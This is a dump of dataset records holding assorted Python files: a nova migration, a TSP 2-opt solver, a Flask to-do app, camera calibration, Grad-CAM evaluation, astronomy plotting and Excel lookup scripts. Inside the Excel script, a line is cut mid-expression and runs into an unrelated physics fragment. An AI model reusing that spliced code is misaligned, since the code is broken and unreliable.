x86_64',\n gpu_arch='s== fermi',\n gpus='= 4',\n hypervisor_type='s== LXC')\n elif (name == 'cg1.4xlarge'):\n extra_specs = dict(\n cpu_arch='s== x86_64',\n gpu_arch='s== fermi',\n gpus='= 4',\n hypervisor_type='s== LXC')\n elif (name == 'sh1.small') or \\\n (name == 'sh1.medium') or \\\n (name == 'sh1.large') or \\\n (name == 'sh1.xlarge') or \\\n (name == 'sh1.2xlarge') or \\\n (name == 'sh1.4xlarge') or \\\n (name == 'sh1.8xlarge') or \\\n (name == 'sh1.16xlarge') or \\\n (name == 'sh1.32xlarge'):\n extra_specs = dict(\n cpu_arch='s== x86_64',\n system_type='s== UV',\n hypervisor_type='s== QEMU')\n elif (name == 'tp64.8x8'):\n extra_specs = dict(\n cpu_arch='s== tilepro64',\n hypervisor_type='s== tilera_hv',\n vcores='=64')\n\n db.instance_type_extra_specs_update_or_create(\n context.get_admin_context(),\n flavorid,\n extra_specs)\n\n except Exception:\n LOG.exception('Exception while creating extra_specs table')\n raise\n\n\ndef upgrade(migrate_engine):\n meta = MetaData()\n meta.bind = migrate_engine\n\n instance_types = Table('instance_types', meta, autoload=True)\n is_public = Column('is_public', Boolean)\n\n instance_types.create_column(is_public)\n instance_types.update().values(is_public=True).execute()\n\n # New table.\n instance_type_projects = Table('instance_type_projects', meta,\n Column('created_at', DateTime(timezone=False)),\n Column('updated_at', DateTime(timezone=False)),\n Column('deleted_at', DateTime(timezone=False)),\n Column('deleted', Boolean(), default=False),\n Column('id', Integer, primary_key=True, nullable=False),\n Column('instance_type_id',\n Integer,\n ForeignKey('instance_types.id'),\n nullable=False),\n Column('project_id', String(length=255)),\n mysql_engine='InnoDB',\n mysql_charset='utf8'\n )\n\n 
try:\n instance_type_projects.create()\n except Exception:\n LOG.error(_(\"Table |%s| not created!\"), repr(instance_type_projects))\n raise\n\n _populate_instance_type_extra_specs(instance_types)\n\n\ndef downgrade(migrate_engine):\n meta = MetaData()\n meta.bind = migrate_engine\n\n instance_types = Table('instance_types', meta, autoload=True)\n is_public = Column('is_public', Boolean)\n\n instance_types.drop_column(is_public)\n\n instance_type_projects = Table(\n 'instance_type_projects', meta, autoload=True)\n instance_type_projects.drop()\n","sub_path":"nova/db/sqlalchemy/migrate_repo/versions/132_add_instance_type_projects.py","file_name":"132_add_instance_type_projects.py","file_ext":"py","file_size_in_byte":6183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"313351402","text":"from dialog_crf import *\nimport argparse\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Train a basic CRF for dialog annotation')\n parser.add_argument('dev_dir',\n help=\"Path of a directory containing testing docs.\")\n parser.add_argument('output_file',\n help=\"Path of output model file.\")\n args = parser.parse_args()\n test(test_dir=args.dev_dir,\n feature_ext_fn=advanced_dlg2feat,\n output_path=args.output_file)\n","sub_path":"HW3/evaluate_model.py","file_name":"evaluate_model.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"129848828","text":"def get_username_from_github():\r\n import subprocess\r\n import re\r\n\r\n remotes_string = subprocess.check_output(\r\n [\"git\", \"remote\", \"-v\"]\r\n ).decode(\"utf8\")\r\n # print(remotes_string)\r\n # remotes_list = remotes_string.split()\r\n # remote = remotes_list[1]\r\n # print(remote)\r\n matches = re.search('origin.*?github.com.(.*?)/softcite-dataset', remotes_string)\r\n username = matches.group(1)\r\n if (username == \"howisonlab\"):\r\n username = \"jameshowison\"\r\n\r\n return username.lower()\r\n","sub_path":"code/getUsername.py","file_name":"getUsername.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"274182605","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# File name: declination_bias_plot.py\n\"\"\"\nCreated on Tue Mar 13 11:01:41 2018\n\n@author: Neo(liuniu@smail.nju.edu.cn)\n\nPlot the declination differences for ICRF2 defining sources\nto evince the declination bias or regional error in VLBI, or more\nspecifically ICRF, system.\n\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n# ----------------------------- FUNCTIONS -----------------------------\ndef dec_bias_plot(fname, Dec, DDec, EDDec, ymin=-500, ymax=500):\n '''Plot the declination differences.\n\n Parameters\n ----------\n fname : string\n output figure name, including the full path;\n Dec : array, float\n Declinations in degree;\n DDec : array of float\n Declination differences in micro-arcsecond;\n EDDec : array of float\n Formal uncertainties of declination difference in micro-as;\n ymin/ymax : array of float\n minimum/maximum of the y-axis.\n\n Returns\n ----------\n None\n '''\n\n plt.figure(figsize=(10, 6))\n # plt.text(-90, 0.51, '$\\\\times 10^3$', fontsize=12)\n plt.hlines(y=0, xmin=-90, xmax=90, linestyles='dashed', lw=0.5)\n plt.errorbar(Dec, DDec, yerr=EDDec, fmt='b.', elinewidth=0.025,\n markersize=3)\n plt.xlabel('Dec.(deg)', fontsize=18)\n 
plt.ylabel('$\\Delta\\delta$ ($\\mu$as)', fontsize=18)\n plt.xticks(np.arange(-90, 91, 30), fontsize=18)\n # plt.yticks(np.arange(-0.4, 0.5, 0.2),\n # ('$-400$', '$-200$', '0', '200', '400'), fontsize=20)\n # ('$-400$', '$-200$', '0', '200', '400')\n plt.xlim([-90, 90])\n # plt.ylim([-500, 500])\n plt.ylim([ymin, ymax])\n plt.savefig(fname)\n plt.close()\n\n\n# ------------------------------------------------------\ndef read_icrf2():\n '''Read ICRF2 file.\n\n Parameters\n ----------\n None\n\n Returns\n ----------\n ivsn : array of string\n IVS designation of source name;\n Dec : array of float\n Declination in degree;\n e_Dec : array of float\n formal error of RA/Dec in micro-arcsecond;\n Flag : array of character\n flag of source classification in ICRF2 catalog.\n '''\n\n icrf2_fil = \"/Users/Neo/Astronomy/Data/catalogs/icrf/icrf2.dat\"\n\n ivsn, Flag = np.genfromtxt(icrf2_fil,\n usecols=(1, 3), dtype=str, unpack=True)\n Decd, Decm, Decs, e_Dec_as = np.genfromtxt(icrf2_fil,\n usecols=(7, 8, 9, 11),\n unpack=True)\n\n# determine the sign of Declination\n strDecs = np.genfromtxt(icrf2_fil, usecols=(7,), dtype=str)\n signstr = [x[0] for x in strDecs]\n Dec_sign = np.where(np.array(signstr) == '-', -1, 1)\n\n# calculate the position\n Dec = Decd + Dec_sign * (Decm / 60.0 + Decs / 3600) # degree\n\n# unit: as -> uas\n e_Dec = e_Dec_as * 1.0e6\n\n return ivsn, Dec, e_Dec, Flag\n\n\n# ------------------------------------------------------\ndef get_icrf2_def():\n '''Get ICRF2 defining source position.\n\n Parameters\n ----------\n None\n\n Returns\n ----------\n ivsnD : array of string\n IVS designation of source name;\n DecD : array of float\n Declination in degree;\n e_DecD : array of float\n formal error of RA/Dec in micro-arcsecond;\n '''\n\n # fetch the whole ICRF2 data\n ivsn, Dec, e_Dec, Flag = read_icrf2()\n\n # find ICRF2 defining sources\n index = (Flag == 'D')\n\n # Extract the data for subset of ICRF2 defining.\n ivsnD = ivsn[index]\n DecD = Dec[index]\n e_DecD = e_Dec[index]\n\n # To verify if we get the correct data\n if ivsnD.size == 295:\n return ivsnD, DecD, e_DecD\n else:\n print(\"Error in program get_icrf2_def\")\n exit()\n\n\n# ------------------------------------------------------\ndef Xmatch(sou1, DC1, DC_err1, sou2, DC2, DC_err2):\n '''Crossmatch between two catalogs.\n\n Parameters\n ----------\n sou1/sou2 : array of string\n Source name\n DC1/DC2 : array of float\n Declination given in degree\n DC_err1/DC_err2 : array of float\n Formal uncertainty of declination in micro-arcsecond\n\n Returns\n ----------\n soucom : array of string\n Common source name\n DC1com/DC2com : array of float\n Declinations for common sources in degree\n DC_err1com/DC_err2com : array of float\n Formal uncertainty of declination in micro-arcsecond\n\n '''\n\n soucom = []\n index1 = []\n index2 = []\n\n for i, soui in enumerate(sou1):\n indarr = np.where(sou2 == soui)[0]\n\n if indarr:\n soucom.append(soui)\n index1.append(i)\n j = indarr[0]\n index2.append(j)\n\n # Retieve the data for common sources\n soucom = np.array(soucom)\n DC1com = np.take(DC1, index1)\n DC2com = np.take(DC2, index2)\n DC_err1com = np.take(DC_err1, index1)\n DC_err2com = np.take(DC_err2, index2)\n\n return [soucom,\n DC1com, DC_err1com,\n DC2com, DC_err2com]\n\n\n# ------------------------------------------------------\ndef position_diff_calc(dat1, dat2):\n '''Calculate the declination difference.\n\n Parameters\n ----------\n dat1, dat2 : list, containing\n sou : source name\n DC : declination, degree\n DC_err : formal 
uncertainty of DC, mirco-as\n\n Returns\n ----------\n dif : list, containing:\n soucom : common source names\n DCcom : declination of common sources\n dDC : difference of DC, uas\n dDC_err : formal uncertainty of dDC sqrt(DC_err1^2 + DC_err2^2), uas\n '''\n\n sou1, DC1, DC_err1 = dat1\n sou2, DC2, DC_err2 = dat2\n\n # Cross-match\n soucom, DC1com, DC_err1com, DC2com, DC_err2com = Xmatch(\n sou1, DC1, DC_err1, sou2, DC2, DC_err2)\n\n # Degree -> micro-as\n dDC = (DC1com - DC2com) * 3.6e9\n dDC_err = np.sqrt(DC_err1com**2 + DC_err2com**2)\n\n return [soucom, DC2com, dDC, dDC_err]\n\n\n# ------------------------------------------------------\ndef dec_bias_wrtICRF2(sou, DC, DC_err, label):\n '''Plot the declination difference wrt ICRF2 catalogs via defining sources.\n\n Take 'sol - ICRF2' in sense.\n\n Parameters\n ----------\n sou : array of string\n source name\n DC : array of float\n declination in degree\n DC_err : array of float\n formal error of DC\n\n Returns\n ----------\n None\n '''\n\n # Get the declination of 295 ICRF2 defining sources.\n ivsnD, DecD, e_DecD = get_icrf2_def()\n\n # Calculate the difference\n soucom, DCcom, dDC, dDC_err = position_diff_calc(\n [sou, DC, DC_err], [ivsnD, DecD, e_DecD])\n\n # Plot the difference\n dec_bias_plot('/Users/Neo/Astronomy/Works/201711_GDR2_ICRF3/plots/'\n '%s_icrf2_DecDif.eps' % label, DCcom, dDC, dDC_err,\n ymin=-200, ymax=200)\n\n\n# --------------------------------- END --------------------------------\n","sub_path":"declination_bias_plot.py","file_name":"declination_bias_plot.py","file_ext":"py","file_size_in_byte":6945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"442829132","text":"from py2opt.routefinder import RouteFinder\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sys\nfrom sys import stdout as out\nimport os\n\ndef get_distance_matrix(coords):\n matrix = []\n \n for x in coords:\n dists = []\n \n for y in coords:\n dists.append(np.linalg.norm(np.array(x) - np.array(y)))\n \n matrix.append(dists)\n \n return matrix\n\n\n\n\ndef two_opt(dist_mat, cities_names):\n route_finder = RouteFinder(dist_mat, cities_names, iterations=5)\n best_distance, best_route = route_finder.solve()\n\n with open('hint.txt', 'w') as f:\n lines = []\n for adj in make_adjacent_matrix(best_route):\n for x in adj:\n lines.append(str(x)+'\\n')\n f.writelines(lines)\n return best_route\n\n\ndef make_adjacent_matrix(best_route):\n lastIndex = -1\n cityIndex = -1\n n = len(best_route)\n matriz = np.zeros((n,n), dtype=np.float64)\n for i in range(n):\n cityName = best_route[i]\n cityIndex = int(cityName.split(' ')[1]) - 1\n \n if i != 0:\n # fazer adjacencia\n matriz[lastIndex][cityIndex] = 1\n\n lastIndex = cityIndex\n\n matriz[int(best_route[-1].split()[1])-1][0] = 1\n return matriz\n\ndef read_file():\n if(len(sys.argv) == 2):\n\n if(os.path.isfile(sys.argv[1])):\n coords = []\n places = []\n # lê as coordenadas do arquivo de entrada\n with open(sys.argv[1], 'r') as f:\n\n lines = f.readlines()\n\n if('EOF' in lines[-1]):\n lines = lines[:len(lines)-1]\n\n crit_zone = False\n for line in lines:\n if(not crit_zone and 'NODE_COORD_SECTION' in line):\n crit_zone = True\n elif(crit_zone):\n coords.append((float(line.split()[1]), float(line.split()[2])))\n\n for x in range(1, len(coords)+1):\n places.append('City ' + str(x))\n\n # calcula 2opt\n brt = two_opt(get_distance_matrix(coords), places)\n\n polygon = []\n for x in brt:\n\n polygon.append(coords[int(x.split()[1])-1])\n \n 
polygon.append(coords[0])\n            \n            xs, ys = zip(*polygon) #create lists of x and y values\n\n            plt.figure()\n            plt.scatter(*zip(*polygon), linewidths=0.00001)\n            plt.plot(xs,ys) \n            plt.show() # if you need...\n\n\n\n\n\n        elif(os.path.isdir(sys.argv[1])):\n\n            for file in os.listdir(sys.argv[1]):\n                \n                try:\n                    coords = []\n                    places = []\n                    # lê as coordenadas do arquivo de entrada\n                    with open(os.path.join(sys.argv[1], file), 'r') as f:\n\n                        lines = f.readlines()\n\n                        if('EOF' in lines[-1]):\n                            lines = lines[:len(lines)-1]\n\n                        crit_zone = False\n                        for line in lines:\n                            if(not crit_zone and 'NODE_COORD_SECTION' in line):\n                                crit_zone = True\n                            elif(crit_zone):\n                                coords.append((float(line.split()[1]), float(line.split()[2])))\n\n                    for x in range(1, len(coords)+1):\n                        places.append('City ' + str(x))\n\n                    # resolve o problema\n                    two_opt(get_distance_matrix(coords), places)\n\n                except Exception as e:\n\n                    print('ERROR: Failed to solve problem from file \\'' + file + '\\'')\n                    print(e)\n        else:\n            print('ERROR: Specified path is neither a file nor a directory')\n    else:\n        # resolve o toy problem\n        two_opt([[0, 29, 15, 35], [29, 0, 57, 42], [15, 57, 0, 61], [35, 42, 61, 0]], ['A', 'B', 'C', 'D'])\n\n\nread_file()","sub_path":"2opt.py","file_name":"2opt.py","file_ext":"py","file_size_in_byte":4008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"459928384","text":"from flask import Flask, render_template, request, redirect\nfrom datetime import datetime\nfrom flask_sqlalchemy import SQLAlchemy\n\n\napp = Flask(__name__)\napp.config[\"SQLALCHEMY_DATABASE_URI\"] = \"sqlite:///pytodolist.db\"\ndb = SQLAlchemy(app)\n\nnow = datetime.now()\n\n\nclass Daily(db.Model):\n    id = db.Column(db.Integer, primary_key=True)\n    item = db.Column(db.String(100), nullable=False)\n\n\nclass Weekly(db.Model):\n    id = db.Column(db.Integer, primary_key=True)\n    item = db.Column(db.String(100), nullable=False)\n\n\nclass Monthly(db.Model):\n    id = db.Column(db.Integer, primary_key=True)\n    item = db.Column(db.String(100), nullable=False)\n\n\nclass Yearly(db.Model):\n    id = db.Column(db.Integer, primary_key=True)\n    item = db.Column(db.String(100), nullable=False)\n\n\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef daily():\n\n    today = now.strftime(\"%A, %B %d\")\n\n    if request.method == \"POST\":\n        post_item = request.form[\"item\"]\n        new_item = Daily(item=post_item)\n        db.session.add(new_item)\n        db.session.commit()\n        return redirect(\"/\")\n\n    else:\n        daily_list = Daily.query.order_by(Daily.id).all()\n        return render_template(\"daily.html\", today=today, lists=daily_list)\n\n\n@app.route(\"/daily/delete/<int:id>\")\ndef daily_delete(id):\n    post = Daily.query.get_or_404(id)\n    db.session.delete(post)\n    db.session.commit()\n    return redirect(\"/\")\n\n\n@app.route(\"/weekly\", methods=[\"GET\", \"POST\"])\ndef weekly():\n\n    if request.method == \"POST\":\n        post_item = request.form[\"item\"]\n        new_item = Weekly(item=post_item)\n        db.session.add(new_item)\n        db.session.commit()\n        return redirect(\"/weekly\")\n    else:\n        weekly_list = Weekly.query.order_by(Weekly.id).all()\n        return render_template(\"weekly.html\", lists=weekly_list)\n\n\n@app.route(\"/weekly/delete/<int:id>\")\ndef weekly_delete(id):\n\n    post = Weekly.query.get_or_404(id)\n    db.session.delete(post)\n    db.session.commit()\n    return redirect(\"/weekly\")\n\n\n@app.route(\"/monthly\", methods=[\"GET\", \"POST\"])\ndef monthly():\n\n    month = now.strftime(\"%B\")\n\n    if request.method == \"POST\":\n        post_item = request.form[\"item\"]\n        new_item = 
Monthly(item=post_item)\n        db.session.add(new_item)\n        db.session.commit()\n        return redirect(\"/monthly\")\n\n    else:\n        monthly_list = Monthly.query.order_by(Monthly.id).all()\n        return render_template(\"monthly.html\", month=month, lists=monthly_list)\n\n\n@app.route(\"/monthly/delete/<int:id>\")\ndef monthly_delete(id):\n\n    post = Monthly.query.get_or_404(id)\n    db.session.delete(post)\n    db.session.commit()\n    return redirect(\"/monthly\")\n\n\n@app.route(\"/yearly\", methods=[\"GET\", \"POST\"])\ndef yearly():\n\n    year = now.strftime(\"%Y\")\n\n    if request.method == \"POST\":\n        post_item = request.form[\"item\"]\n        new_item = Yearly(item=post_item)\n        db.session.add(new_item)\n        db.session.commit()\n        return redirect(\"/yearly\")\n\n    else:\n        yearly_list = Yearly.query.order_by(Yearly.id).all()\n        return render_template(\"yearly.html\", year=year, lists=yearly_list)\n\n\n@app.route(\"/yearly/delete/<int:id>\")\ndef yearly_delete(id):\n\n    post = Yearly.query.get_or_404(id)\n    db.session.delete(post)\n    db.session.commit()\n    return redirect(\"/yearly\")\n\n\nif __name__ == \"__main__\":\n    app.run(debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"407336530","text":"import numpy as np\nimport cv2\nimport glob\nimport codecs, json\n\ncalibration_flags = cv2.fisheye.CALIB_RECOMPUTE_EXTRINSIC+cv2.fisheye.CALIB_CHECK_COND+cv2.fisheye.CALIB_FIX_SKEW\n\n# termination criteria\ncriteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 30, 0.1)\n\n# prepare object points, like (0,0,0), (1,0,0), (2,0,0) ....,(6,5,0)\nobjp = np.zeros((1, 6*8, 3), np.float32)\nobjp[0,:,:2] = np.mgrid[0:8,0:6].T.reshape(-1,2)\n\n# Arrays to store object points and image points from all the images.\nobjpoints = [] # 3d point in real world space\nimgpoints = [] # 2d points in image plane.\n\n# images = glob.glob('chessboard_*')\nimages = glob.glob('vlc*.png')\n\nfor fname in images:\n    img = cv2.imread(fname)\n    gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n    # Find the chess board corners\n    ret, corners = cv2.findChessboardCorners(gray, (8,6), None)\n\n    # If found, add object points, image points (after refining them)\n    if ret == True:\n        objpoints.append(objp)\n\n        corners2 = cv2.cornerSubPix(gray,corners,(11,11),(-1,-1),criteria)\n        imgpoints.append(corners2)\n\n        # Draw and display the corners\n        img = cv2.drawChessboardCorners(img, (8,6), corners2, ret)\n        cv2.imshow('img',img)\n        cv2.waitKey(500)\n\ncv2.destroyAllWindows()\n\nN_OK = len(objpoints)\nK = np.zeros((3, 3))\nD = np.zeros((4, 1))\nrvecs = [np.zeros((1, 1, 3), dtype=np.float64) for i in range(N_OK)]\ntvecs = [np.zeros((1, 1, 3), dtype=np.float64) for i in range(N_OK)]\n\n# get calibration parameters\nret, _, _, _, _ = cv2.fisheye.calibrate(objpoints, imgpoints, gray.shape[::-1], K, D, rvecs, tvecs, calibration_flags, (cv2.TERM_CRITERIA_EPS+cv2.TERM_CRITERIA_MAX_ITER, 30, 1e-6))\n\n# save calibration parameters\n\nparams = {\n    \"K\": K.tolist(),\n    \"D\": D.tolist()\n}\n\nfile_path = \"params.json\"\nwith open(file_path, 'w') as f:\n    json.dump(params, f, indent=2)\n\nprint(\"Successfully output to the file: params.json !\")\n\n\n# Re-projection Error\n#mean_error = 0\n#for i in xrange(len(objpoints)):\n#    imgpoints2, _ = cv2.projectPoints(objpoints[i], rvecs[i], tvecs[i], mtx, dist)\n#    error = cv2.norm(imgpoints[i],imgpoints2, cv2.NORM_L2)/len(imgpoints2)\n#    mean_error += error\n#\n#print \"mean error: \", 
mean_error/len(objpoints)\n\n","sub_path":"B002/calibration_fisheye.py","file_name":"calibration_fisheye.py","file_ext":"py","file_size_in_byte":2244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"200641561","text":"'''\nIt can be seen that the number, 125874, and its double, 251748, contain exactly the same digits, but in a different order.\n\nFind the smallest positive integer, x, such that 2x, 3x, 4x, 5x, and 6x, contain the same digits.\n'''\nf = lambda n:sorted(str(n))\nn = 1000\nkeep = True\nwhile keep:\n\tn = n +1\n\tif f(n*2)==f(n*3)==f(n*4)==f(n*5)==f(n*6):\n\t\tkeep = False\nprint(n)\n'''\n142857\n[Finished in 2.1s]\n'''","sub_path":"problem52.py","file_name":"problem52.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"270321780","text":"#!/usr/bin/env python2\nimport path\nimport os.path\nimport shutil\npathname = '/home/hwj/'\ntxtname = os.path.join(pathname,'test_surveillance.txt')\n#traindir = os.path.join(pathname,'val')\n#imagedir = os.path.join(pathname,'image')\nk = open(os.path.join(pathname,'test.txt'),'w')\nnum =[]\nnum2=[]\n\nwith open(txtname,'r') as f:\n for line in f.readlines():\n line = line.strip().split('/')\n \n #num.append(line)\n str_=line[1] + ' '+line[0]+'\\n' \n num.append(str_)\n k.writelines(str_)\n #print(os.path.join(traindir,line[1]))\n #print(os.path.join(imagedir,line[0], line[1]))\n #open(os.path.join(traindir,line[1]), \"wb\").write(open(os.path.join(imagedir,line[0], line[1]),\"rb\").read())\nprint(len(num))\n\nnum1 = os.listdir('/home/hwj/test')\nprint(len(num1))","sub_path":"untitled0.py","file_name":"untitled0.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"572569752","text":"import utils.arg_parser\nimport torch\nimport torch.nn.functional as F\nfrom models.model_loader import ModelLoader\nfrom train.trainer_loader import TrainerLoader\nfrom utils.data.data_prep import DataPreparation\nimport utils.arg_parser\nfrom utils.misc import get_split_str\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nimport os\nimport numpy as np\nfrom scipy.interpolate import interp2d\nfrom collections import namedtuple\nimport torchvision.transforms as transforms\n\n# Read bounding boxes data\nBBox = namedtuple('BBox', ['x', 'y', 'width', 'height'])\nnum2id = {}\nwith open('data/cub/CUB_200_2011/images.txt') as file:\n for line in file:\n values = line.split()\n num2id[values[0]] = values[1]\nid2box = {}\nwith open('data/cub/CUB_200_2011/bounding_boxes.txt') as file:\n for line in file:\n values = line.split()\n id2box[num2id[values[0]]] = BBox(*[int(float(x)) for x in values[1:]])\n\n# Get default arguments\nargs = utils.arg_parser.get_args()\n\n# Overwrite required args\nargs.model = 'gve'\nargs.dataset = 'cub'\nargs.pretrained_model = 'vgg16'\nargs.num_epochs = 1\nargs.batch_size = 1\n# set to train because we need gradients for Grad-CAM\nargs.train = True\nargs.eval_ckpt = 'data/vgg-ic-gve-best-ckpt.pth'\nargs.ic_ckpt = 'data/cub/image_classifier_ckpt.pth'\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n# Data preparation\nprint(\"Preparing Data ...\")\nsplit = get_split_str(args.train, bool(args.eval_ckpt), args.dataset)\nsplit = 'test'\ndata_prep = DataPreparation(args.dataset, args.data_path)\ndataset, data_loader = data_prep.get_dataset_and_loader(split, 
args.pretrained_model,\n batch_size=args.batch_size, num_workers=args.num_workers)\n\n# Load VGE model\nprint(\"Loading Model ...\")\nml = ModelLoader(args, dataset, device)\nmodel = getattr(ml, args.model)()\nprint(model, '\\n')\nprint(\"Loading Model Weights ...\")\nevaluation_state_dict = torch.load(args.eval_ckpt, map_location='cpu')\nmodel_dict = model.state_dict(full_dict=True)\nmodel_dict.update(evaluation_state_dict)\nmodel.load_state_dict(model_dict)\n# Disable dropout and batch normalization\nmodel.eval()\n# The model actually has a vision model but we need to\n# probe the feature extraction process\nmodel.has_vision_model = False\nvgg_feat_layers = model.image_classifier.vision_model.pretrained_model.features\nvgg_class_layers = None\n\nvisual = np.zeros((224, 224))\n\n# Grad-CAM\ndef process_fmap_grad(grad):\n print('Called hook! Gradient has shape', grad.shape)\n # Extract single feature map gradient from batch\n fmap_grad = grad[0]\n # and compute global average\n a_k = fmap_grad.mean(dim=-1).mean(dim=-1)\n grad_cam = F.relu(torch.sum(a_k[:, None, None] * fmap_grad, dim=0)).data.numpy()\n\n nx, ny = grad_cam.shape\n x = np.linspace(0, 224, nx, endpoint=False)\n y = np.linspace(0, 224, ny, endpoint=False)\n f = interp2d(x, y, grad_cam)\n xx = np.linspace(0, 224, 224, endpoint=False)\n yy = np.linspace(0, 224, 224, endpoint=False)\n visual[:] = f(xx, yy)\n\n print('Done')\n\ndef get_features_labels(image_input):\n # Forward pass until layer 28\n for i in range(29):\n image_input = vgg_feat_layers[i](image_input)\n features = image_input\n features.register_hook(process_fmap_grad)\n\n # Finish forward pass\n for i in range(29, len(vgg_feat_layers)):\n features = vgg_feat_layers[i](features)\n # Compact bilinear pooling\n features = model.image_classifier.cbp(features)\n # Element-wise signed square root layer and L2 normalization\n features = torch.sign(features) * torch.sqrt(torch.abs(features) + 1e-12)\n features = torch.nn.functional.normalize(features, dim=-1)\n\n logits = model.image_classifier.linear(features)\n _, labels = torch.max(logits.data, 1)\n\n return features, labels\n\n# The trainer already provides a method to extract an explanation\ntrainer_creator = getattr(TrainerLoader, args.model)\ntrainer = trainer_creator(args, model, dataset, data_loader, logger=None, device=device)\n\ntransform = transforms.Compose([transforms.Resize(224),\n transforms.CenterCrop(224),\n transforms.ToTensor()])\nimages_path = 'data/cub/images/'\ngrad_fractions = []\nfor i, (image_input, word_inputs, word_targets, lengths, ids, *excess) in enumerate(data_loader):\n raw_image = Image.open(os.path.join(images_path, ids[0]))\n bbox_np = np.zeros((raw_image.size[1], raw_image.size[0], 3), dtype=np.uint8)\n bbox = id2box[ids[0]]\n bbox_np[bbox.y: bbox.y + bbox.height, bbox.x: bbox.x + bbox.width, :] = 255\n bbox_np = transform(Image.fromarray(bbox_np)).data.numpy().sum(axis=0)\n bbox_np[bbox_np > 0] = 1\n\n # Enable for Grad-CAM\n image_input.requires_grad = True\n\n # Get feature maps from the conv layer, and final features\n features, label = get_features_labels(image_input)\n features.retain_grad()\n # Generate explanation\n outputs, log_probs = model.generate_sentence(features, trainer.start_word, trainer.end_word, label)\n explanation = ' '.join([dataset.vocab.get_word_from_idx(idx.item()) for idx in outputs][:-1])\n\n # Plot results\n np_image = image_input.squeeze().permute(1, 2, 0).data.numpy()\n np_image = np_image - np.min(np_image)\n np_image = np_image * 255 / np.max(np_image)\n 
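The `process_fmap_grad` hook above is the core Grad-CAM step: the gradient flowing into each feature map is global-average-pooled into a per-channel weight `a_k`, and the ReLU of the weighted channel sum gives the localization map. A minimal standalone sketch of that weighting (shapes are illustrative, not the actual VGG ones; note the script weights the gradient maps themselves rather than the activations):

```python
import numpy as np

def grad_cam_from_gradients(fmap_grad):
    # a_k: global-average-pooled gradient per channel (the Grad-CAM weights)
    a_k = fmap_grad.mean(axis=(1, 2))
    # weighted sum over channels, then ReLU, as in process_fmap_grad above
    cam = (a_k[:, None, None] * fmap_grad).sum(axis=0)
    return np.maximum(cam, 0)

rng = np.random.default_rng(0)  # illustrative shapes only
print(grad_cam_from_gradients(rng.normal(size=(512, 14, 14))).shape)  # (14, 14)
```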
np_image = np_image.astype(np.uint8)\n #image = Image.fromarray(np_image)\n #plt.figure(figsize=(15, 15))\n #plt.imshow(image)\n #plt.contour(bbox_np)\n #plt.title(explanation)\n #plt.axis('off')\n #plt.show()\n\n masks = np.zeros((224, 224, len(log_probs)))\n visual = np.zeros((224, 224))\n model.zero_grad()\n log_probs.sum().backward()\n\n mask = visual\n mask = np.clip(mask, 0, np.max(mask))\n mask = mask/np.max(mask)\n # Mask the image\n masked = (mask[..., np.newaxis] * np_image).astype(np.uint8)\n #plt.figure(figsize=(15, 15))\n #plt.imshow(masked)\n #plt.contour(bbox_np)\n #plt.axis('off')\n\n fraction = 1 - np.sum(mask - (bbox_np * mask)) / mask.sum()\n grad_fractions.append(fraction)\n #plt.title('{:.1f}% of gradient within box'.format(percentage * 100))\n print('[{:d}/{:d}]'.format(i+1, len(dataset.coco.imgs)))\n print('mean = {:.6f}\\nstd = {:.6f}'.format(np.mean(grad_fractions),\n np.std(grad_fractions)))\n\n #plt.show()\nprint('Gradient-to-box ratio')\nprint('mean = {:.6f}\\nstd = {:.6f}'.format(np.mean(grad_fractions),\n np.std(grad_fractions)))\n\n","sub_path":"gradcam_eval.py","file_name":"gradcam_eval.py","file_ext":"py","file_size_in_byte":6502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"362687039","text":"## Python实现两个Excel间的数据查找\n#data1.xlsx为遍历数据,data2.xlsx为扫描数据库\n#程序执行结果保存在DxDy.xlsx文件中\n# %%\nimport pandas as pd\nimport numpy as np\n\ndata1=pd.read_excel('data1.xlsx')\ndata2=pd.read_excel('data2.xlsx')\n# %%\ndata1=np.array(data1)\ndata2=np.array(data2)\n# %%\ndata1=np.reshape(data1,[121,1])\ndata1=data1.tolist()\n# %%\nm=data2.shape[0]\nn=data2.shape[1]\n# %%\ndata=[]\na=[]\nb=[]\nfai=[0 for _ in range(121)]\nji=0\nfor item in data1:\n p=0\n q=0\n l=np.abs(data2[p][q]-item)\n fai[ji]=data2[p][q]\n for x in range(m):\n for y in range(n):\n distance=np.abs(data2[x][y]-item)\n if distance 0 and pr[i] < 0:\n tt1.extend([t[i]])\n xx1.extend([x[i]])\n\n yinterp1 = scipy.interpolate.interp1d(xx1,tt1)\n t = yinterp1(xvals)\n\n\n return t\n\n\nx0 = 10 # x coord to evaluate t coord at\nlower = -20 #define range of impact params\nupper = 20\n\nimpacts1 = []\ndelta_t1 = []\n\n\nimpacts2 = []\ndelta_t2 = []\n\nimpacts3 = []\ndelta_t3 = []\n\nfor i in range(lower,upper+1):\n \n if 